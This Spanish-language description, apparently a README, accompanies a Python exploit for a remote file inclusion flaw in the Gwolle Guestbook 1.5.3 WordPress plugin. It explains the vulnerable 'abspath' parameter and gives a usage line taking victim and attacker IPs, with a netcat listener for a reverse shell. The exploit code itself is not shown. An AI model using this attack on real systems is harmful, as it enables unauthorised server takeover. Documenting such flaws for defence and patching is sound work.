
Plugin de WordPress Gwolle Guestbook 1.5.3 - Inclusión Remota de Archivos
Este script en Python explota una vulnerabilidad crítica de Inclusión Remota de Archivos (RFI) en el plugin Gwolle Guestbook de WordPress, que puede ser explotada por un atacante no autenticado para incluir un archivo PHP remoto y ejecutar código arbitrario en el sistema vulnerable.
El parámetro HTTP GET "abspath" no se sanitiza adecuadamente antes de ser utilizado en la función PHP require(). Un atacante remoto puede incluir un archivo llamado 'wp-load.php' desde un servidor remoto arbitrario y ejecutar su contenido en el servidor web vulnerable. Para ello, el atacante debe colocar un archivo 'wp-load.php' malicioso en el directorio raíz de su servidor e incluir la URL del servidor en la solicitud.
La explotación exitosa de esta vulnerabilidad puede llevar al compromiso de toda la instalación de WordPress e incluso al compromiso de todo el servidor web.
El script requiere tres argumentos:
Ejemplo:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTNota: Debes tener un listener de netcat abierto en la máquina atacante en el puerto especificado.
Este script se proporciona únicamente con fines educativos. El autor no se hace responsable de ningún daño causado por el mal uso de este script.